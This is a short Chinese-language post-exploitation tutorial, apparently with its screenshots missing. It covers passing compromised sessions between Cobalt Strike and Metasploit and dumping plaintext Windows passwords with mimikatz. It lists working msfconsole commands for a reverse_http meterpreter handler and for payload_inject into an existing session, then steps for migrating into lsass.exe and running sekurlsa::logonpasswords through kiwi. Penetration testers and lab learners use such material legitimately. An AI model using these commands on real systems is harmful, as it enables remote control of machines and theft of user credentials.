cs会话传递到msf
条件:已上线cs,获得控制权
在msf上启用reverse_http模块监听本地端口:
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.88.128
set lport 4444
在cs上创建一个foreign http监听,ip和端口设置为msf监听的ip和端口:
凭证提权 -> 新建会话 —> 选择创建的foreign http监听:
msf成功拿到会话:
msf会话传递到cs
条件:msf已获取meterpreter shell
在cs上创建一个http beacon的监听器:
msf启用payload_inject模块,ip和端口设置为cs监听的ip和端口:
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set lhost 192.168.88.128
set lport 4567
set session 1
set DisablePayloadHandler true
cs成功拿到会话:
mimikatz抓取win2012明文密码
cs利用mimikatz抓取明文密码
cs必须获取一个管理员权限的会话:
会话交互执行命令logonpasswords,然后beacon执行mimikatz模块:
msf利用mimikatz抓取明文密码
同样的msf必须先获取一个管理员权限的shell:
查看当前系统信息,可以看出目标系统是64位的:
查看当前进程列表lsass.exe进程PID为484:
把当前meterpreter shell进程迁移到PID为484的lsass.exe进程里,加载kiwi模块,使用kiwi_cmd执行mimikatz命令sekurlsa::logonpasswords: